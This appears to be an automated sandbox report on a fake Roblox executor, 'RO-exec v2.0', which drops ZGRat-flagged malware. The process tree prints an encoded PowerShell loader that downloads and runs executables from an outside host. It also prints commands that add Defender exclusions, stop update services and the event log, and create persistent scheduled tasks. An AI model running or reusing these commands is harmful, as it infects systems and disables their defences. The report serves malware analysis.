Overview
overview
10Static
static
1RO-exec fr....0.rar
windows7-x64
3RO-exec fr....0.rar
windows10-2004-x64
7RO-exec v2...er.exe
windows7-x64
10RO-exec v2...er.exe
windows10-2004-x64
10RO-exec v2...ad.txt
windows7-x64
1RO-exec v2...ad.txt
windows10-2004-x64
1RO-exec v2...al.cfg
windows7-x64
3RO-exec v2...al.cfg
windows10-2004-x64
3RO-exec v2...ve.cfg
windows7-x64
3RO-exec v2...ve.cfg
windows10-2004-x64
3RO-exec v2...ox.cfg
windows7-x64
3RO-exec v2...ox.cfg
windows10-2004-x64
3RO-exec v2...od.cfg
windows7-x64
3RO-exec v2...od.cfg
windows10-2004-x64
3RO-exec v2...rd.cfg
windows7-x64
3RO-exec v2...rd.cfg
windows10-2004-x64
3RO-exec v2...al.cfg
windows7-x64
3RO-exec v2...al.cfg
windows10-2004-x64
3RO-exec v2...ry.cfg
windows7-x64
3RO-exec v2...ry.cfg
windows10-2004-x64
3Analysis
-
max time kernel
33s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28/03/2024, 09:48
Static task
static1
Behavioral task
behavioral1
Sample
RO-exec free remake v2.0.rar
Resource
win7-20240319-en
Behavioral task
behavioral2
Sample
RO-exec free remake v2.0.rar
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
RO-exec v2.0/RO-exec_Launcher.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
RO-exec v2.0/RO-exec_Launcher.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
RO-exec v2.0/auto_load.txt
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
RO-exec v2.0/auto_load.txt
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
RO-exec v2.0/configs/arsenal.cfg
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
RO-exec v2.0/configs/arsenal.cfg
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
RO-exec v2.0/configs/autosave.cfg
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
RO-exec v2.0/configs/autosave.cfg
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
RO-exec v2.0/configs/counterblox.cfg
Resource
win7-20240215-en
Behavioral task
behavioral12
Sample
RO-exec v2.0/configs/counterblox.cfg
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
RO-exec v2.0/configs/dahood.cfg
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
RO-exec v2.0/configs/dahood.cfg
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
RO-exec v2.0/configs/jailbird.cfg
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
RO-exec v2.0/configs/jailbird.cfg
Resource
win10v2004-20240319-en
Behavioral task
behavioral17
Sample
RO-exec v2.0/configs/universal.cfg
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
RO-exec v2.0/configs/universal.cfg
Resource
win10v2004-20240226-en
Behavioral task
behavioral19
Sample
RO-exec v2.0/configs/weaponry.cfg
Resource
win7-20240220-en
Behavioral task
behavioral20
Sample
RO-exec v2.0/configs/weaponry.cfg
Resource
win10v2004-20240226-en
General
-
Target
RO-exec v2.0/RO-exec_Launcher.exe
-
Size
2.3MB
-
MD5
ee091b0aff43b9506fbc384642f44275
-
SHA1
1f0328c27b1dcbc3bc726ab5a2fa7cafc89c0ac5
-
SHA256
b1b4c0259825fa79fe6176502cd6900ec7411687981f8e5d9738edbd83fd9dca
-
SHA512
06ca311ea0db212ffeb834bd703a5e545ff69e196f7973f108248361f253d91342b431fa895b516bf54fd15c91eebcd2a4a4132560bfd2ec05310cd8217c2e00
-
SSDEEP
49152:uIYdMYohOojDmYf2r3klp0S++a3t99BDwlrFevdd39BRIbD8M:u2POo72b1SBw9crF6n3ZI
Malware Config
Signatures
-
Detect ZGRat V1 6 IoCs
resource yara_rule behavioral4/files/0x000c00000002313e-96.dat family_zgrat_v1 behavioral4/files/0x000c00000002313e-105.dat family_zgrat_v1 behavioral4/files/0x000c00000002313e-106.dat family_zgrat_v1 behavioral4/memory/1196-107-0x00000000002E0000-0x00000000004E4000-memory.dmp family_zgrat_v1 behavioral4/files/0x000700000002325a-293.dat family_zgrat_v1 behavioral4/files/0x000700000002325a-292.dat family_zgrat_v1 -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4728 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4460 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4032 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4492 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4884 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3128 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4736 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4056 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4536 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5084 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3932 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 760 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4360 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4912 3448 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3560 3448 schtasks.exe 94 -
Blocklisted process makes network request 1 IoCs
flow pid Process 14 4448 powershell.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" Nezur.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation RO-exec_Launcher.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation conhostsyn.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation rbHypersurrogatesavesDhcp.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation .rbHypersurrogatesavesDhcp.exe -
Executes dropped EXE 5 IoCs
pid Process 3568 Nezur.exe 2548 rbHypersurrogatesavesDhcp.exe 4664 conhostsyn.exe 4620 .conhostsyn.exe 1196 .rbHypersurrogatesavesDhcp.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe .conhostsyn.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2644 RO-exec_Launcher.exe -
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe .rbHypersurrogatesavesDhcp.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\f3b6ecef712a24 .rbHypersurrogatesavesDhcp.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe .rbHypersurrogatesavesDhcp.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe .rbHypersurrogatesavesDhcp.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\56085415360792 .rbHypersurrogatesavesDhcp.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\fr-FR\TextInputHost.exe .rbHypersurrogatesavesDhcp.exe File created C:\Windows\fr-FR\22eafd247d37c3 .rbHypersurrogatesavesDhcp.exe File created C:\Windows\ModemLogs\RuntimeBroker.exe .rbHypersurrogatesavesDhcp.exe File created C:\Windows\ModemLogs\9e8d7a4ca61bd9 .rbHypersurrogatesavesDhcp.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4388 sc.exe 3548 sc.exe 4848 sc.exe 804 sc.exe 880 sc.exe 3104 sc.exe 2504 sc.exe 4892 sc.exe 3704 sc.exe 2884 sc.exe 60 sc.exe 4940 sc.exe 5068 sc.exe 4896 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4460 schtasks.exe 4032 schtasks.exe 4884 schtasks.exe 3128 schtasks.exe 760 schtasks.exe 4360 schtasks.exe 4912 schtasks.exe 3560 schtasks.exe 4492 schtasks.exe 4536 schtasks.exe 5084 schtasks.exe 4728 schtasks.exe 4736 schtasks.exe 4056 schtasks.exe 3932 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings .rbHypersurrogatesavesDhcp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4448 powershell.exe 4448 powershell.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe 1196 .rbHypersurrogatesavesDhcp.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 3568 Nezur.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 1196 .rbHypersurrogatesavesDhcp.exe Token: SeDebugPrivilege 3568 Nezur.exe Token: SeLoadDriverPrivilege 3568 Nezur.exe Token: SeDebugPrivilege 3672 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeDebugPrivilege 1840 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3568 Nezur.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2644 RO-exec_Launcher.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 2644 wrote to memory of 4448 2644 RO-exec_Launcher.exe 89 PID 2644 wrote to memory of 4448 2644 RO-exec_Launcher.exe 89 PID 2644 wrote to memory of 4448 2644 RO-exec_Launcher.exe 89 PID 4448 wrote to memory of 3568 4448 powershell.exe 95 PID 4448 wrote to memory of 3568 4448 powershell.exe 95 PID 4448 wrote to memory of 2548 4448 powershell.exe 97 PID 4448 wrote to memory of 2548 4448 powershell.exe 97 PID 4448 wrote to memory of 2548 4448 powershell.exe 97 PID 4448 wrote to memory of 4664 4448 powershell.exe 98 PID 4448 wrote to memory of 4664 4448 powershell.exe 98 PID 4448 wrote to memory of 4664 4448 powershell.exe 98 PID 4664 wrote to memory of 4620 4664 conhostsyn.exe 102 PID 4664 wrote to memory of 4620 4664 conhostsyn.exe 102 PID 2548 wrote to memory of 1196 2548 rbHypersurrogatesavesDhcp.exe 103 PID 2548 wrote to memory of 1196 2548 rbHypersurrogatesavesDhcp.exe 103 PID 1196 wrote to memory of 2440 1196 .rbHypersurrogatesavesDhcp.exe 123 PID 1196 wrote to memory of 2440 1196 .rbHypersurrogatesavesDhcp.exe 123 PID 1196 wrote to memory of 2144 1196 .rbHypersurrogatesavesDhcp.exe 124 PID 1196 wrote to memory of 2144 1196 .rbHypersurrogatesavesDhcp.exe 124 PID 1196 wrote to memory of 2956 1196 .rbHypersurrogatesavesDhcp.exe 125 PID 1196 wrote to memory of 2956 1196 .rbHypersurrogatesavesDhcp.exe 125 PID 1196 wrote to memory of 2920 1196 .rbHypersurrogatesavesDhcp.exe 126 PID 1196 wrote to memory of 2920 1196 .rbHypersurrogatesavesDhcp.exe 126 PID 1196 wrote to memory of 3672 1196 .rbHypersurrogatesavesDhcp.exe 127 PID 1196 wrote to memory of 3672 1196 .rbHypersurrogatesavesDhcp.exe 127 PID 1196 wrote to memory of 3268 1196 .rbHypersurrogatesavesDhcp.exe 133 PID 1196 wrote to memory of 3268 1196 .rbHypersurrogatesavesDhcp.exe 133 PID 3268 wrote to memory of 1436 3268 cmd.exe 156 PID 3268 wrote to memory of 1436 3268 cmd.exe 156 PID 3268 wrote to memory of 2024 3268 cmd.exe 136 PID 3268 wrote to memory of 2024 3268 cmd.exe 136 PID 3892 wrote to memory of 4220 3892 cmd.exe 144 PID 3892 wrote to memory of 4220 3892 cmd.exe 144 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RO-exec v2.0\RO-exec_Launcher.exe"C:\Users\Admin\AppData\Local\Temp\RO-exec v2.0\RO-exec_Launcher.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeABqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABxAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcABpAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBOAGUAegB1AHIALgBlAHgAZQAnACwAIAA8ACMAYQB4AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBOAGUAegB1AHIALgBlAHgAZQAnACkAKQA8ACMAYwB6AHcAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAHIAZQBtAG8AdABlAC8AcgBiAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcALAAgADwAIwB4AHAAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAbABoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcABrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHIAYgBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAKQA8ACMAZQBwAHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAeQBuAC4AZQB4AGUAJwAsACAAPAAjAGcAbgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQBnAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBxAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAHkAbgAuAGUAeABlACcAKQApADwAIwBxAHkAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGUAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATgBlAHoAdQByAC4AZQB4AGUAJwApADwAIwB6AHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAHMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgB6AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcgBiAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQA8ACMAaABsAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBkAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAeABlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwB5AG4ALgBlAHgAZQAnACkAPAAjAGMAegBpACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Users\Admin\AppData\Roaming\Nezur.exe"C:\Users\Admin\AppData\Roaming\Nezur.exe"3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3568
-
-
C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe"C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe"C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\fr-FR\TextInputHost.exe'5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\RuntimeBroker.exe'5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\MoUsoCoreWorker.exe'5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9i9q0RW3JC.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:1436
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:2024
-
-
C:\Windows\ModemLogs\RuntimeBroker.exe"C:\Windows\ModemLogs\RuntimeBroker.exe"6⤵PID:4540
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\conhostsyn.exe"C:\Users\Admin\AppData\Roaming\conhostsyn.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Users\Admin\AppData\Roaming\.conhostsyn.exe"C:\Users\Admin\AppData\Roaming\.conhostsyn.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4620 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:4220
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:60
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:4940
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:4388
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:2504
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:4896
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵PID:456
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵PID:3236
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵PID:4820
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵PID:1436
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "driverupdate"5⤵
- Launches sc.exe
PID:4892
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"5⤵
- Launches sc.exe
PID:3548
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:4848
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "driverupdate"5⤵
- Launches sc.exe
PID:3704
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4728
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 11 /tr "'C:\Windows\fr-FR\TextInputHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Windows\fr-FR\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Windows\fr-FR\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\ModemLogs\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\ModemLogs\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\ModemLogs\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4536
-
